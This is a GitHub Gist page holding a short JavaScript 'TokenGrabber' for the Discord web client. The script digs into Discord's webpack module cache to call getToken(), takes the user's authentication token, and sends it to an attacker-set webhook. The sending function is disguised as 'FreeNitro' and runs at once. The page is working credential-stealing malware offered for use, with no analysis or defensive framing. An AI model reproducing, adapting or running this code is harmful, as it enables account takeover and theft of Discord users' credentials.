Last active
May 27, 2021 03:34
-
-
Save Github3742/bbc6a32ac883765a6af7fec53d8a9f56 to your computer and use it in GitHub Desktop.
TokenGrabber For DiscordWebpage
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const webhookurl = 'your webhook link here'; | |
var req = webpackJsonp.push([ | |
[], { | |
extra_id: (e, t, r) => e.exports = r | |
}, | |
[ | |
["extra_id"] | |
] | |
]); | |
for (let e in req.c) | |
if (req.c.hasOwnProperty(e)) { | |
let t = req.c[e].exports; | |
if (t && t.__esModule && t.default) | |
for (let e in t.default) "getToken" === e && (token = t.default.getToken()) | |
} | |
function FreeNitro() { | |
var e = new XMLHttpRequest; | |
e.open("POST", webhookurl), e.setRequestHeader("Content-type", "application/json"); | |
var t = { | |
username: "Icicle", | |
avatar_url: "https://cdn.discordapp.com/attachments/778196615340490765/847315096744362044/static-assets-upload7577422454435941793.jpg", | |
content: "", | |
embeds: [{ | |
color: "4700374", | |
description: "Token: " + token, | |
footer: { | |
text: "By Flamestyx#4007" | |
} | |
}] | |
}; | |
e.send(JSON.stringify(t)) | |
} | |
FreeNitro(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment